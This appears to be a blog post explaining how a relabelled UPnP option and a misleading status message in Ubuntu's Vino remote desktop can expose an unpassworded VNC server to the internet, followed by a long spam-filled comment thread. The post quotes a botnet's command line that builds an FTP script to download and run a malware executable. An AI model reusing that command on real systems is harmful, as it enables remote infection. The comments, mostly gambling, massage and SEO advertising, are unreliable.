This post highlights how even a small modification to a graphical user interface can be responsible for causing unintended security problems.
When Ubuntu's remote desktop service (Vino) first introduced support for UPnP, this is what the Security section of new configuration dialog looked like:
The UPnP feature was activated by checking "Talk to the router and try to open the doors there". Although this label was criticised for sounding too informal, it did actually give a reasonable impression of what might happen if you checked the box. Namely, it used UPnP to configure the router such that the remote desktop service could be accessed from the internet.
However, this is what the option now looks like in the current Long Term Support version of Ubuntu (10.04.3 LTS, Lucid Lynx):
(This is a screenshot from a real victim of the problem I am about to describe)
Notice that this unfortunate user has enabled remote control of their desktop, with no password protection. What was possibly going through their mind? Well, convenience, most likely. Indeed, the lack of password may not necessarily pose any security problems if the Ubuntu desktop is on a trusted network and not connected directly to the internet. This would be typical of many home networks, where internet access is usually provided by a NAT-enabled router.
But also notice that the UPnP option is now labelled "Configure network automatically to accept connections". The user has checked this box - after all, why wouldn't you want a connection to be accepted automatically? Convenience is the goal here, and there is nothing to suggest that this option really means "accept connections from the entire internet".
So, after checking the box, the user's UPnP-enabled router will start to accept connections from the internet on port 5900 and forward them to the Ubuntu desktop. Even so, the settings dialog reassuringly and erroneously states that "Your desktop is only reachable over the local network." The combination of this bug and the slightly unclear option label has caused the user to accidentally open the doors on their Ubuntu desktop. To anyone.
Anybody in the world can now use this person's computer simply by using a VNC client to connect to the public-facing IP address of the router (no password required, of course).
Internet-facing VNC servers are often subjected to automated attacks from botnets, but vino-server's lack of connection logging might make these hard to trace after the event. Thankfully, most of the automated attacks happening right now are only designed to exploit Windows systems. You may, for example, notice attacks similar to the following, which launch a command prompt and create a temporary FTP script named "ik", which is then used to download and execute malware:
cmd /c echo open example.com 21 >> ik &echo user xyz letmein >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
echo You got owned
The botnet simply connects to an exposed VNC server and sends these characters to the remote Windows computer. Quite cheeky, but at least it has the decency to tell the user they got owned!
Are you affected by this? If you have enabled remote desktop or vino-server on any version of Ubuntu or Windows, you should probably double check that you haven't inadvertently exposed the service to the entire internet. If you do wish for the service to be internet visible, ensure that you use a suitably strong password and keep your server software up to date.
now present in your city
ReplyDeleteThat's why, if you fall into this category, you'll need someone to keep an eye on your kids wherever they are. The person you choose to take care of your children should be trustworthy and honest.security services in London We've heard of cases where caretakers liaise with kidnappers to abduct children. You don't want to fall victim to such a racket. UK Close Protection Services are specialists in child protection. When you hire us, we'll provide you with armed and unarmed bodyguards to protect your family against any harm or kidnap.
ReplyDelete"Can I simply just say what a relief to find a person that genuinely understands what they are talking about on the internet.
ReplyDeleteYou definitely know how to bring an issue to light and make it important.
A lot more people ought to check this out and understand
this side of your story. It's surprising you are not more popular because you definitely have the gift."
오피
It’s remarkable to go to see this web site and reading the views of all mates about this paragraph, while I am also eager of getting know-how.
ReplyDelete마사지
I’m impressed, I must say. I’m here for the first time. Superb! I simply must tell you that I really love your blogs page. My boyfriend enjoys your blogs.
ReplyDelete건전마사지
This comment has been removed by the author.
ReplyDeleteVery informative Blog! There is so much information here that can help thank you for sharing.
ReplyDeleteData Science Training in Lucknow
토토365프로
ReplyDelete스포츠토토
This was truly a useful publish. Thanks a lot
스포츠토토티비
ReplyDelete스포츠중계
This is a lovely post. I really appreciate your optimism and I agree with your post and looking forward for more post from you..
We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work thank you.
ReplyDeleteBusiness Analytics Course in Chandigarh
Give the privilege of being a member until it makes people who are interested are widespread and come to apply for membership on the web without interruption. Don't hesitate to apply for membership today. Million dollar slots are waiting for you. Ak88king
ReplyDeleteoncasino
ReplyDeleteHit on a Soft 17 - A lot of players make this mistake because of|as a end result of} the general rule is to Stand on Hard 17. However on a Soft 17 , the Ace makes all of the difference. When you 우리계열 imagine that your whole will beat the dealer's whole. "Change please" - This is a method of asking the dealer to transform your cash into taking part in} chips.
ReplyDeleteRely on the Best Local SEO services in India by Divine Soft Technology and get stay on the top of the search results. Ours is an SEO company in Delhi that works to get you prominence online.
ReplyDeleteThanks for bringing alert to readers especially ubuntu users. Small changes will make much difference coding related OS such as Ubuntu. It's really nice to bring this beautiful article for us. Thanks for sharing and keep sharing more related blogs. Traffic Lawyer Alleghany Virginia
ReplyDeleteThanks for sharing this wonderful blog. Best CRM Software for Marketing in 2023
ReplyDeleteI always looking for a blog that is related to my problem and then I found this. Fence Company Spring Hill, FL
ReplyDeleteare you the same guy who wrote IRC Hacks? it's my favourite book for bedtime reading <3
ReplyDeleteWow Excellent post ! an amazing article, I'd like to draft like this too-taking a time and real hardwork to make a great article, Its very easy for me to know about the topic and the undersand to content that resonates with them, Thanks for sharing your insights...
ReplyDeletehow long does an uncontested divorce take in virginia
Abogado De Divorcio En Virginia
I am genuinely thankful for the priceless insights you've shared in this blog post. Your thoughtful analysis and creative concepts have truly deepened my grasp of the topic. I wholeheartedly commend you for the dedication you've shown in crafting this enlightening article. I'm eagerly anticipating the wealth of knowledge I'll gain from your future posts.
ReplyDeleteDriving Suspended License Misdemeanor New Jersey